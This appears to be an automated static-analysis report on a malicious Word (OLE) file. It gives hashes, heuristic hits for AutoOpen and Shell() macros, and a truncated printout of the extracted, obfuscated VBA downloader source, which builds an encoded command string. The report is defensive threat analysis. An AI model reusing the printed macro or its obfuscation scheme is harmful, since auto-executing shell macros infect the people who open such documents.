Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e22d16931840e6ee…

MALICIOUS

Office (OLE)

218.8 KB Created: 2018-06-26 14:02:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: e1131b4665947406f210e8b5e4575833 SHA-1: 0b9af8c97e4aa39c0229db9878b0547bb7e5acb3 SHA-256: e22d16931840e6eee8e6c8e9bf3ec16ec7b39606b303f162aeed1c2281dce77e
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The critical heuristic firing for 'OLE_VBA_SHELL' indicates the presence of a Shell() call within the VBA macros. The AutoOpen macro, identified by 'OLE_VBA_AUTOOPEN' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC', is designed to execute automatically upon opening the document. The reconstructed string 'g10@3z30q100z11i35!63C63!59@113X100g100!32}36}56C34z39!' likely represents a command or URL used to download and execute a secondary payload, which is further supported by the presence of a PowerShell technique.

Heuristics 6

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8542 bytes
SHA-256: ed03f4c726ead7801787e52b01cdcda66d2ec6e08d0e445f2c147727e6c70fc0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CIalEmj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "lpwREiXDScO"
Function vYjtJ()
On Error Resume Next
zGpJV = CDate(38803)
BRZFj = 11945
fSvDPo = 7428
zKLjcC = 8228
VFzrIn = Sin(63268)
jvvwDE = IwjHq
aKAoJ = "He" + "ll " + " " + Chr(40) + "'1" + "11z29@4" + "7C59!118" + "}37}46" + "g60g1" + "02" + "@36" + "q41i33"
mzfVaz = Sin(28227)
aIwjrl = 45063
qrCkk = jRaBML
pXDwp = CDate(65503)
Jwuaf = 12142
kucXi = 42647
zDDnABfoU = "X4" + "6X40}" + "63!107" + "i5z46X" + "63q101!2" + "8i46g4" + "1@" + "8@39C34@" + "46z"
PmdzrG = Sin(98681)
WrkbMA = 17935
fwwRhs = KEiHi
cihOh = CDate(26579)
npiWd = 20947
ozKscc = 91072
lObzDkd = "37g63!11" + "2g111!" + "13C7X60" + "!118@10" + "8g3" + "5z63i63" + "g59!113C" + "100i100C" + "60X60@60" + "z101z" + "42z61" + "b46z3"
ATZtq = Sin(80961)
RBHnUX = 35628
Qbmhs = QvDiL
MYFZG = CDate(33884)
tflcw = 76483
RhDERG = 49412
FQffTi = "8C4" + "6X42" + "i47q36g" + "60" + "q5" + "6i101C" + "40C" + "36g" + "38C100@" + "44g4" + "1@27"
wojiv = 32296
HbDqz = CDate(5993)
mdjVT = 64639
ZPjtn = XlpJj
iPcdo = 40194
wGBFG = Sin(58658)
NttZos = "g10@3z30" + "q100z" + "11i3" + "5!63C" + "63!59@" + "113" + "X100g100" + "!32}" + "36}56" + "C3" + "4z39!"
nYnoRf = 97777
BNGPUf = CDate(72519)
zbivq = 3063
wKzsAP = cpjodm
RkjDE = 97726
AnFPS = Sin(48)
DEpAvVQM = "39" + "}36}59!4" + "6i5" + "7q62g" + "63q" + "36" + "@62C57i5" + "6i101q4"
zpdvC = 3404
MKrKp = CDate(19411)
BWQDj = 82996
slCHIl = DijmP
tjNUUU = 66003
SBbSVB = Sin(90460)
ZuLjoznHVh = "0}36X3" + "8g100g" + "38b57C" + "46" + "g59C114!" + "42q" + "3}58b10" + "0}11q3" + "5@63}63" + "b5"
KdKsM = 49569
sHNZz = CDate(46768)
fiQwd = 35337
vjLIc = vYLGjZ
hITtnw = 29396
vfFYT = Sin(19493)
oWXromHopGn = "9q113z10" + "0i100i6" + "0q60" + "q60X1" + "01}4" + "0z62i56@"
fNwqO = 21645
sQDTmG = CDate(93781)
wkbQZp = 44195
XJfDG = FBQPVl
jBLFac = 31034
icnknj = Sin(15949)
VJPGu = "63b3" + "6q38X42" + "}40" + "@40" + "!46z56q" + "56" + "!47" + "z4" + "2}63q" + "42@41q" + "42b5" + "6X46q10"
XIdGjE = 38796
jiRAM = CDate(8899)
imKSj = 30018
wNGCr = jMsaMS
clwwXE = 35903
DsJTR = Sin(77387)
ShJlrEHZp = "1b40b36" + "}38q1" + "00q33" + "i3" + "6C34" + "b6" + "2X46X35" + "X63g57!" + "100g" + "114q" + "44b1"
RSGDG = 70132
qwiWw = CDate(24125)
sZnIh = 86453
NuiwVb = dvHrM
ohDzW = 77381
PESaW = Sin(52342)
LYwYXwtwjoY = "14z1" + "27X59z1" + "21q100" + "@1" + "1b3" + "5C63}"
zjZcZb = 95627
idndz = CDate(85792)
DiJJz = 93445
KVomt = Wunaqk
pZdhU = 71787
kzuGn = Sin(83076)
SzGaHLEEEph = "63z" + "59" + "b113g" + "100!10" + "0!60" + "C60" + "g60q" + "101C47g" + "46}34b" + "38" + "i59z3"
vYjtJ = aKAoJ + zDDnABfoU + lObzDkd + FQffTi + NttZos + DEpAvVQM + ZuLjoznHVh + oWXromHopGn + VJPGu + ShJlrEHZp + LYwYXwtwjoY + SzGaHLEEEph
ztrozB = 47680
FsjTd = CDate(73457)
KDfLzb = 57866
boODX = wMNRjI
pjjwX = 70417
wNiVk = Sin(59856)
End Function
Function vChQQ()
On Error Resume Next
TarNEH = 8518
wEizZ = CDate(77332)
aMRkm = 40505
wPZrn = izaEW
aPznK = 45354
SfWPPD = Sin(97236)
wLqjzusAdJV = "9g42" + "!37z6" + "3g101g" + "40q" + "36@38X10" + "0C" + "8g13b56" + "q13g" + "114}25" + "q30q100" + "@11g3"
BjfaF = 60080
GQCICC = CDate(90630)
SfzaL = 4711
YGMHBw = CVkjY
SDoGw = 53699
YhGjs = Sin(60034)
JTPutrHUIq = "5z63" + "z63!59i" + "113}10" + "0!100i" + "37X45g62" + "z56}" + "46b47q34" + "i44X3"
wwZTFA = 72310
IrSQp = CDate(31280)
iuOBZo = 28770
qbjnZp = mBWdjU
DqsXM = 75139
EGiJp = Sin(31042)
PSYlzwzVmP = "4i" + "63@42!39" + "g101}40X" + "36g101" + "C49" + "i42i10" + "0g14C8!" + "41b"
hBEvzV = 84584
EBhkYZ = CDate(97610)
fZObT = 82737
IBcbF = iKTUop
zQwWf = 97906
AFdhu = Sin(78186)
LEajMmw = "40b45" + "g15g" + "51" + "g58" + "q100g1" + "08z101q2" + "4z5" + "9i39" + "!34}63X" + "99z108" + "!11"
ovaYid = 12468
NCwnHU = CDate(6707)
wcAqJ =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.